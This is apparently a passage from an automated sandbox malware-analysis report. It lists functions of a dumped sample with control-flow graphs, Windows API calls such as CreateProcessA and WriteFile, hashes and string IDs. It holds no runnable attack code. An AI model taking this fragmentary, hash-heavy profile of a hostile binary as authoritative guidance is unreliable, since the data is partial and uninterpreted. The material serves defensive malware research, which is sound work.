                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID: *$,=ym$-=ym$-=ym$B$H
                                              • API String ID: 3934441357-3163594065
                                              • Opcode ID: 159a7d1c4120d72bbc33ae3d84a0f0c1bffc0e935829c5a29355e62d68df031b
                                              • Instruction ID: 0d1bed58c2fcc1b499681f05c3d7cfa2a76cd6e2f0bd927ace7c811a0d987a68
                                              • Opcode Fuzzy Hash: 159a7d1c4120d72bbc33ae3d84a0f0c1bffc0e935829c5a29355e62d68df031b
                                              • Instruction Fuzzy Hash: 04726B74609345DFCB14CF28C4A065ABBE1AFAA304F188E1EF499CBB51D778D8468B53
                                              Function 6C074200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;T55
                                              • API String ID: 0-2572755013
                                              • Opcode ID: 1fff1d3ab96fc129e1fd9b4351f1099f7e479e226880d62367619004b54cab67
                                              • Instruction ID: e01668677911b4d2897c4f0b87d6ea14814b8159a60d21991820a558b87128b7
                                              • Opcode Fuzzy Hash: 1fff1d3ab96fc129e1fd9b4351f1099f7e479e226880d62367619004b54cab67
                                              • Instruction Fuzzy Hash: C303D431645B018FCB28CF28C8D0799B7E3AFD5328759CB6DC0A64BA95DB74B44ACB50
                                              Function 6C1F86E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4469 6c1f86e0-6c1f8767 CreateProcessA 4470 6c1f878b-6c1f8794 4469->4470 4471 6c1f8796-6c1f879b 4470->4471 4472 6c1f87b0-6c1f87fa WaitForSingleObject CloseHandle * 2 4470->4472 4473 6c1f879d-6c1f87a2 4471->4473 4474 6c1f8770-6c1f8783 4471->4474 4472->4470 4473->4470 4475 6c1f87a4-6c1f8807 4473->4475 4474->4470
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CloseHandle$CreateObjectProcessSingleWait
                                              • String ID: D
                                              • API String ID: 2059082233-2746444292
                                              • Opcode ID: 2612a8d7ea87629b2d2f27c8d45d5111dcb7affe7b823977d1b9b1684fcd89a3
                                              • Instruction ID: edc60ade0452d7989bdeab494b0970828fb18ae195f10117c372437a87c3d51e
                                              • Opcode Fuzzy Hash: 2612a8d7ea87629b2d2f27c8d45d5111dcb7affe7b823977d1b9b1684fcd89a3
                                              • Instruction Fuzzy Hash: BC31E471819380CFE740DF29D18871ABBF0AB9A318F515A1EF8E9963A0D7789585CF43
                                              Function 6C20F34E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4477 6c20f34e-6c20f36a 4478 6c20f370-6c20f372 4477->4478 4479 6c20f529 4477->4479 4480 6c20f394-6c20f3b5 4478->4480 4481 6c20f374-6c20f387 call 6c2030cf call 6c2030bc call 6c203810 4478->4481 4482 6c20f52b-6c20f52f 4479->4482 4483 6c20f3b7-6c20f3ba 4480->4483 4484 6c20f3bc-6c20f3c2 4480->4484 4497 6c20f38c-6c20f38f 4481->4497 4483->4484 4486 6c20f3c4-6c20f3c9 4483->4486 4484->4481 4484->4486 4488 6c20f3da-6c20f3eb call 6c20f530 4486->4488 4489 6c20f3cb-6c20f3d7 call 6c20e359 4486->4489 4498 6c20f42c-6c20f43e 4488->4498 4499 6c20f3ed-6c20f3ef 4488->4499 4489->4488 4497->4482 4500 6c20f440-6c20f449 4498->4500 4501 6c20f485-6c20f4a7 WriteFile 4498->4501 4502 6c20f3f1-6c20f3f9 4499->4502 4503 6c20f416-6c20f422 call 6c20f5a1 4499->4503 4507 6c20f475-6c20f483 call 6c20f9b3 4500->4507 4508 6c20f44b-6c20f44e 4500->4508 4504 6c20f4b2 4501->4504 4505 6c20f4a9-6c20f4af GetLastError 4501->4505 4509 6c20f4bb-6c20f4be 4502->4509 4510 6c20f3ff-6c20f40c call 6c20f94b 4502->4510 4512 6c20f427-6c20f42a 4503->4512 4513 6c20f4b5-6c20f4ba 4504->4513 4505->4504 4507->4512 4515 6c20f450-6c20f453 4508->4515 4516 6c20f465-6c20f473 call 6c20fb77 4508->4516 4514 6c20f4c1-6c20f4c6 4509->4514 4520 6c20f40f-6c20f411 4510->4520 4512->4520 4513->4509 4521 6c20f524-6c20f527 4514->4521 4522 6c20f4c8-6c20f4cd 4514->4522 4515->4514 4523 6c20f455-6c20f463 call 6c20fa8e 4515->4523 4516->4512 4520->4513 4521->4482 4525 6c20f4f9-6c20f505 4522->4525 4526 6c20f4cf-6c20f4d4 4522->4526 4523->4512 4529 6c20f507-6c20f50a 4525->4529 4530 6c20f50c-6c20f51f call 6c2030bc call 6c2030cf 4525->4530 4531 6c20f4d6-6c20f4e8 call 6c2030bc call 6c2030cf 4526->4531 4532 6c20f4ed-6c20f4f4 call 6c2030e2 4526->4532 4529->4479 4529->4530 4530->4497 4531->4497 4532->4497
                                              APIs
                                                • Part of subcall function 6C20F5A1: GetConsoleCP.KERNEL32(?,6C20E7C0,?), ref: 6C20F5E9
                                              • WriteFile.KERNEL32(?,?,6C217DDC,00000000,00000000,?,00000000,00000000,6C2191A6,00000000,00000000,?,00000000,6C20E7C0,6C217DDC,00000000), ref: 6C20F49F
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000,?,?,?,?,00000000,?), ref: 6C20F4A9
                                              • __dosmaperr.LIBCMT ref: 6C20F4EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 251514795-4022487301
                                              • Opcode ID: b00b80f2e870fb812cdcd2f64fde84614d532b76b6a511b39b33aba2ea824511
                                              • Instruction ID: 966e9be4f1c955125097b2b5297afc7d77f59fbc96961ba2440e5e0d2a130296
                                              • Opcode Fuzzy Hash: b00b80f2e870fb812cdcd2f64fde84614d532b76b6a511b39b33aba2ea824511
                                              • Instruction Fuzzy Hash: 7051B471B8120EABDB00DFA4C880FDFBBB9EF0A328F140557ED10A7A51D77499458769
                                              Function 6C1F9280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4544 6c1f9280-6c1f928c 4545 6c1f928e-6c1f9299 4544->4545 4546 6c1f92cd 4544->4546 4547 6c1f92af-6c1f92bc call 6c0c01f0 call 6c204208 4545->4547 4548 6c1f929b-6c1f92ad 4545->4548 4549 6c1f92cf-6c1f9347 4546->4549 4558 6c1f92c1-6c1f92cb 4547->4558 4548->4547 4550 6c1f9349-6c1f9371 4549->4550 4551 6c1f9373-6c1f9379 4549->4551 4550->4551 4553 6c1f937a-6c1f9439 call 6c0c2250 call 6c0c2340 call 6c1fca69 call 6c0be010 call 6c1fa778 4550->4553 4558->4549
                                              APIs
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F9421
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Ios_base_dtorstd::ios_base::_
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 323602529-1866435925
                                              • Opcode ID: 6a79a65eb4f628d32f1796d7e8abc283c6f2c983fa50a7eb6769dc453ce1da94
                                              • Instruction ID: 63f49e1f346313e9a03d1dd33dc03293a9fef2d6844b61fb71f0c3ad21c58a31
                                              • Opcode Fuzzy Hash: 6a79a65eb4f628d32f1796d7e8abc283c6f2c983fa50a7eb6769dc453ce1da94
                                              • Instruction Fuzzy Hash: FC5134B5A00B008FD725CF29C495B97BBF1BB49318F008A2DD89647B90D779B90ACF90
                                              Function 6C1CCEA0 Relevance: 6.2, APIs: 4, Instructions: 187fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4567 6c1ccea0-6c1ccf03 call 6c1fa260 4570 6c1ccf40-6c1ccf49 4567->4570 4571 6c1ccf4b-6c1ccf50 4570->4571 4572 6c1ccf90-6c1ccf95 4570->4572 4573 6c1ccf56-6c1ccf5b 4571->4573 4574 6c1cd000-6c1cd005 4571->4574 4575 6c1ccf9b-6c1ccfa0 4572->4575 4576 6c1cd030-6c1cd035 4572->4576 4581 6c1cd065-6c1cd08c 4573->4581 4582 6c1ccf61-6c1ccf66 4573->4582 4577 6c1cd00b-6c1cd010 4574->4577 4578 6c1cd125-6c1cd158 call 6c1fea90 4574->4578 4583 6c1ccf05-6c1ccf21 WriteFile 4575->4583 4584 6c1ccfa6-6c1ccfab 4575->4584 4579 6c1cd17d-6c1cd191 4576->4579 4580 6c1cd03b-6c1cd040 4576->4580 4589 6c1cd15d-6c1cd175 4577->4589 4590 6c1cd016-6c1cd01b 4577->4590 4578->4570 4587 6c1cd195-6c1cd1a2 4579->4587 4591 6c1cd046-6c1cd060 4580->4591 4592 6c1cd1a7-6c1cd1ac 4580->4592 4595 6c1ccf33-6c1ccf38 4581->4595 4593 6c1ccf6c-6c1ccf71 4582->4593 4594 6c1cd091-6c1cd0aa WriteFile 4582->4594 4588 6c1ccf30 4583->4588 4585 6c1cd0af-6c1cd120 WriteFile 4584->4585 4586 6c1ccfb1-6c1ccfb6 4584->4586 4585->4588 4586->4570 4598 6c1ccfb8-6c1ccfee call 6c1ff010 ReadFile 4586->4598 4587->4570 4588->4595 4589->4579 4590->4570 4600 6c1cd021-6c1cd02b 4590->4600 4591->4587 4592->4570 4599 6c1cd1b2-6c1cd1c0 4592->4599 4593->4570 4601 6c1ccf73-6c1ccf86 4593->4601 4594->4588 4595->4570 4598->4588 4600->4588 4601->4595
                                              APIs
                                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C1CCFE1
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 97bf4e329c0c8c43ea41eeb930918009425eadbf6dfcb2abfe9e8756b659ac42
                                              • Instruction ID: 36a4db2c03b61e35d5234df1a53e3a4faebcfc09b9aa3f7c0cf25266c999c116
                                              • Opcode Fuzzy Hash: 97bf4e329c0c8c43ea41eeb930918009425eadbf6dfcb2abfe9e8756b659ac42
                                              • Instruction Fuzzy Hash: F3716CB0249344AFD710DF28C894B9ABBF4BF99708F50492EF494C7690D3B9D9958B83
                                              Function 6C1CC390 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 631COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4626 6c1cc390-6c1cc406 call 6c1fa260 call 6c1ff010 4631 6c1cc426-6c1cc42f 4626->4631 4632 6c1cc490-6c1cc495 4631->4632 4633 6c1cc431-6c1cc436 4631->4633 4634 6c1cc49b-6c1cc4a0 4632->4634 4635 6c1cc570-6c1cc575 4632->4635 4636 6c1cc43c-6c1cc441 4633->4636 4637 6c1cc500-6c1cc505 4633->4637 4638 6c1cc638-6c1cc63d 4634->4638 4639 6c1cc4a6-6c1cc4ab 4634->4639 4640 6c1cc57b-6c1cc580 4635->4640 4641 6c1cc6d6-6c1cc6db 4635->4641 4642 6c1cc5bf-6c1cc5c4 4636->4642 4643 6c1cc447-6c1cc44c 4636->4643 4644 6c1cc679-6c1cc67e 4637->4644 4645 6c1cc50b-6c1cc510 4637->4645 4646 6c1cc8ab-6c1cc8b0 4638->4646 4647 6c1cc643-6c1cc648 4638->4647 4652 6c1cc796-6c1cc79b 4639->4652 4653 6c1cc4b1-6c1cc4b6 4639->4653 4654 6c1cc586-6c1cc58b 4640->4654 4655 6c1cc830-6c1cc835 4640->4655 4656 6c1cc6e1-6c1cc6e6 4641->4656 4657 6c1cc912-6c1cc917 4641->4657 4658 6c1cc5ca-6c1cc5cf 4642->4658 4659 6c1cc863-6c1cc868 4642->4659 4660 6c1cc742-6c1cc747 4643->4660 4661 6c1cc452-6c1cc457 4643->4661 4650 6c1cc684-6c1cc689 4644->4650 4651 6c1cc8e2-6c1cc8e7 4644->4651 4648 6c1cc7de-6c1cc7e3 4645->4648 4649 6c1cc516-6c1cc51b 4645->4649 4680 6c1ccdda-6c1ccdf1 4646->4680 4681 6c1cc8b6-6c1cc8bb 4646->4681 4678 6c1cc64e-6c1cc653 4647->4678 4679 6c1ccb08-6c1ccb34 4647->4679 4666 6c1cc7e9-6c1cc7ee 4648->4666 4667 6c1cccfa-6c1ccd23 4648->4667 4662 6c1cc521-6c1cc526 4649->4662 4663 6c1cc9a3-6c1cc9b3 4649->4663 4684 6c1cc68f-6c1cc694 4650->4684 4685 6c1ccb61-6c1ccb85 4650->4685 4682 6c1cc8ed-6c1cc8f2 4651->4682 4683 6c1ccdf9-6c1cce12 4651->4683 4664 6c1cc408-6c1cc418 4652->4664 4665 6c1cc7a1-6c1cc7a6 4652->4665 4686 6c1cc4bc-6c1cc4c1 4653->4686 4687 6c1cc97a-6c1cc984 4653->4687 4668 6c1cc9fe-6c1cca3a 4654->4668 4669 6c1cc591-6c1cc596 4654->4669 4670 6c1ccd6c-6c1ccd88 4655->4670 4671 6c1cc83b-6c1cc840 4655->4671 4690 6c1cc6ec-6c1cc6f1 4656->4690 4691 6c1ccc12-6c1ccc4d call 6c1ff010 call 6c1cb4d0 4656->4691 4688 6c1cc91d-6c1cc922 4657->4688 4689 6c1cce1a-6c1cce29 4657->4689 4672 6c1cc5d5-6c1cc5da 4658->4672 4673 6c1cca71-6c1cca9b call 6c1fea90 4658->4673 4674 6c1cc86e-6c1cc873 4659->4674 4675 6c1ccdb7-6c1ccdbf 4659->4675 4692 6c1cc74d-6c1cc752 4660->4692 4693 6c1ccca3-6c1cccba 4660->4693 4676 6c1cc93d-6c1cc95b 4661->4676 4677 6c1cc45d-6c1cc462 4661->4677 4694 6c1cc52c-6c1cc531 4662->4694 4695 6c1cc9bd-6c1cc9c5 4662->4695 4663->4695 4717 6c1cc41d 4664->4717 4713 6c1cc7ac-6c1cc7b1 4665->4713 4714 6c1ccce0-6c1cccf5 4665->4714 4715 6c1ccd28-6c1ccd67 4666->4715 4716 6c1cc7f4-6c1cc7f9 4666->4716 4667->4631 4698 6c1cca43-6c1cca6c 4668->4698 4697 6c1cc59c-6c1cc5a1 4669->4697 4669->4698 4709 6c1ccd8a-6c1ccd98 4670->4709 4718 6c1ccd9d-6c1ccdad 4671->4718 4719 6c1cc846-6c1cc84b 4671->4719 4699 6c1ccaa0-6c1ccb03 call 6c1cce50 CreateFileA 4672->4699 4700 6c1cc5e0-6c1cc5e5 4672->4700 4673->4631 4720 6c1cc879-6c1cc8a6 4674->4720 4721 6c1cce31-6c1cce36 4674->4721 4712 6c1ccdc4-6c1ccdd5 4675->4712 4676->4709 4722 6c1cc468-6c1cc46d 4677->4722 4723 6c1cc960-6c1cc975 4677->4723 4702 6c1ccb39-6c1ccb5c 4678->4702 4703 6c1cc659-6c1cc65e 4678->4703 4679->4631 4680->4683 4681->4631 4724 6c1cc8c1-6c1cc8dd 4681->4724 4682->4631 4725 6c1cc8f8-6c1cc90d 4682->4725 4683->4689 4704 6c1ccb8a-6c1ccc0d 4684->4704 4705 6c1cc69a-6c1cc69f 4684->4705 4685->4631 4726 6c1cc989-6c1cc99e 4686->4726 4727 6c1cc4c7-6c1cc4cc 4686->4727 4687->4631 4688->4631 4728 6c1cc928-6c1cc938 4688->4728 4689->4721 4707 6c1ccc77-6c1ccc88 4690->4707 4708 6c1cc6f7-6c1cc6fc 4690->4708 4751 6c1ccc52-6c1ccc72 4691->4751 4710 6c1cc758-6c1cc75d 4692->4710 4711 6c1cccc9-6c1cccd8 4692->4711 4706 6c1cccbc-6c1cccc4 4693->4706 4694->4631 4730 6c1cc537-6c1cc561 4694->4730 4729 6c1cc9ca-6c1cc9f9 4695->4729 4697->4631 4732 6c1cc5a7-6c1cc5ba 4697->4732 4698->4631 4699->4631 4700->4631 4734 6c1cc5eb-6c1cc633 4700->4734 4702->4631 4703->4631 4736 6c1cc664-6c1cc674 4703->4736 4704->4631 4705->4631 4738 6c1cc6a5-6c1cc6d1 4705->4738 4706->4631 4737 6c1ccc8d-6c1ccc9e 4707->4737 4708->4631 4739 6c1cc702-6c1cc73d 4708->4739 4709->4631 4710->4631 4740 6c1cc763-6c1cc791 4710->4740 4711->4714 4712->4631 4713->4631 4741 6c1cc7b7-6c1cc7d9 4713->4741 4714->4717 4715->4631 4716->4631 4742 6c1cc7ff-6c1cc82b 4716->4742 4743 6c1cc420-6c1cc424 4717->4743 4718->4675 4719->4631 4745 6c1cc851-6c1cc85e 4719->4745 4720->4631 4721->4631 4744 6c1cce3c-6c1cce47 4721->4744 4722->4631 4746 6c1cc46f-6c1cc483 4722->4746 4723->4631 4724->4737 4725->4631 4726->4743 4727->4631 4747 6c1cc4d2-6c1cc4fa call 6c1c2a20 call 6c1c2a30 4727->4747 4728->4712 4729->4631 4730->4631 4732->4631 4734->4631 4736->4729 4737->4631 4738->4631 4739->4631 4740->4706 4741->4709 4742->4631 4743->4631 4745->4729 4746->4712 4747->4631 4751->4631
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @*Z$@*Z
                                              • API String ID: 0-2842812045
                                              • Opcode ID: 9282f1aeff02567ec61d049d03453c0e172c7edae4c8417a04ab04c540f066d4
                                              • Instruction ID: 24b72f6807dbba375945e43e4fd79ee5975a5edc6cff6c41de2cc4dc828b0256
                                              • Opcode Fuzzy Hash: 9282f1aeff02567ec61d049d03453c0e172c7edae4c8417a04ab04c540f066d4
                                              • Instruction Fuzzy Hash: 244268706093428FCB14DF18C4A166EBBE1ABA9304F248D6EF49AC7762D238D945CB43
                                              Function 6C20F015 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4755 6c20f015-6c20f029 call 6c214c92 4758 6c20f02b-6c20f02d 4755->4758 4759 6c20f02f-6c20f037 4755->4759 4760 6c20f07d-6c20f09d call 6c214e0f 4758->4760 4761 6c20f042-6c20f045 4759->4761 4762 6c20f039-6c20f040 4759->4762 4770 6c20f0ab 4760->4770 4771 6c20f09f-6c20f0a9 call 6c2030e2 4760->4771 4764 6c20f063-6c20f073 call 6c214c92 CloseHandle 4761->4764 4765 6c20f047-6c20f04b 4761->4765 4762->4761 4763 6c20f04d-6c20f061 call 6c214c92 * 2 4762->4763 4763->4758 4763->4764 4764->4758 4777 6c20f075-6c20f07b GetLastError 4764->4777 4765->4763 4765->4764 4775 6c20f0ad-6c20f0b0 4770->4775 4771->4775 4777->4760
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C21794F), ref: 6C20F06B
                                              • GetLastError.KERNEL32(?,00000000,?,6C21794F), ref: 6C20F075
                                              • __dosmaperr.LIBCMT ref: 6C20F0A0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              • Opcode ID: 4add9684d14346a507400a30eb2da594bef64e66e555d81f0fe60003a2fd5944
                                              • Instruction ID: 793d53f964530265ec399549b32344da76fa26af8167299b0ec6e8fe372674b5
                                              • Opcode Fuzzy Hash: 4add9684d14346a507400a30eb2da594bef64e66e555d81f0fe60003a2fd5944
                                              • Instruction Fuzzy Hash: 4801E53378932C16D71016399844BAB77AB4B8373DF29464AFE2887AC5DF6594448294
                                              Function 6C20428C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 5000 6c20428c-6c204297 5001 6c204299-6c2042ac call 6c2030bc call 6c203810 5000->5001 5002 6c2042ae-6c2042bb 5000->5002 5013 6c204300-6c204302 5001->5013 5004 6c2042f6-6c2042ff call 6c20e565 5002->5004 5005 6c2042bd-6c2042d2 call 6c2043a9 call 6c20be2e call 6c20d350 call 6c20ef88 5002->5005 5004->5013 5019 6c2042d7-6c2042dc 5005->5019 5020 6c2042e3-6c2042e7 5019->5020 5021 6c2042de-6c2042e1 5019->5021 5020->5004 5022 6c2042e9-6c2042f5 call 6c207eab 5020->5022 5021->5004 5022->5004
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8Q
                                              • API String ID: 0-4022487301
                                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                              • Instruction ID: 153481e7ddb09fea7feef5297b423a82570e505a6c932820b3eab59cd59fbd34
                                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                              • Instruction Fuzzy Hash: 3DF0F932B0161C5AD72157299C00BCB33A89F5237DF204B17ED2093EC0DB30D40A86E1
                                              Function 6C1F9050 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F91A4
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F91E4
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
